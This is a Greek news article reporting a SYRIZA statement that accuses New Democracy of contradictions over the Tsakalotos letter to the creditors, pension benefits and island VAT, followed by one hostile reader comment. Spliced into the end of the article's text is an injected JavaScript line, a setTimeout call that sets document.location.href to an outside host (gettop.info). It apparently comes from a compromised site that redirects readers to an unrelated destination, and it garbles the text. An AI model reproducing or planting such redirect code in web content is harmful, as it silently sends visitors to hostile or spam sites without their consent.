ΣΥΡΙΖΑ: Πότε θα μάθει η ΝΔ από τα λάθη της;…

1
8

Δύο ερωτήματα θέτει προς τη ΝΔ το τμήμα οικονομικής πολιτικής του ΣΥΡΙΖΑ, αναφορικά με τις αντιδράσεις της αντιπολίτευσης για την επιστολή Τσακαλώτου προς τους Θεσμούς.

Συγκεκριμένα, το κόμμα σημειώνει ότι «η δημοσιοποίηση από τον υπουργό Οικονομικών της επιστολής του με τις αναγκαίες απαντήσεις και διευκρινίσεις, αφαιρεί και το τελευταίο επιχείρημα της ΝΔ και των ΜΜΕ που την στηρίζουν, στο επικοινωνιακό πυροτέχνημα που προσπάθησαν να στήσουν», υποστηρίζοντας ότι «είναι σαφές ότι όχι μόνο νέες δεσμεύσεις, και άλλα καταστροφολογικά σενάρια δεν επιβεβαιώνονται, αλλά ανοίγει με σαφήνεια ο δρόμος για ανάλογες μελλοντικές παρεμβάσεις και πολιτικές, οι οποίες φυσικά ενοχλούν τις νεοφιλελεύθερες λογικές της λιτότητας που εξυμνεί η ΝΔ».

Ο ΣΥΡΙΖΑ τονίζει ότι «τα ερωτήματα είναι απλά και πρέπει κάποτε η ΝΔ να μάθει από τα συνεχή λάθη της και τις αντιφάσεις και να απαντήσει:

1. Με ποια λογική καταψήφισε την παροχή στο 60,32% των συνταξιούχων για το 2016 ενώ υπερψήφισε την αναστολή αύξησης των συντελεστών Φ.Π.Α σε νησιά (την οποία αύξηση, βέβαια, είχε υπερψηφίσει στο Ν.4336/15);

2.Τώρα, πλέον, που ενεργοποιούνται τα βραχυπρόθεσμα μέτρα ελάφρυνσης του χρέους, θα αναγνωρίσει τις γκάφες και τα λάθη ή θα επιμείνει σε θέσεις που έχουν εγκαταλείψει ακόμη και οι πιο ακραίοι κύκλοι των δανειστών;». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

1 ΣΧΟΛΙΟ

  1. Αυτή είναι η αριστερά του Τσίπρα , του Δρασαγάκη και του Φλαμπουράρη για να δείτε τι θα πει αριστερά του ψέματος, της υποκρισίας, του θράσους, της κοροϊδίας, της αρπαχτής του εισοδήματος των αδυνάτων, της υποταγής, του ψευτοτσαμπουκά, της κωλοτούμπας, του κατατρεγμού και της εγκατάλειψης των προσφύγων. Αριστερά του Πολάκη, του Κατρούγκαλου, του Παπά και του Σκουρλέτη. Η ανδρείκελο της αριστεράς του Τσίπρα και του Πολάκη που εξευτέλισε τις αρχές και τις αξίες της αριστεράς της ελπίδας των αξιών , των αρχών και των ψυχών μας.

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here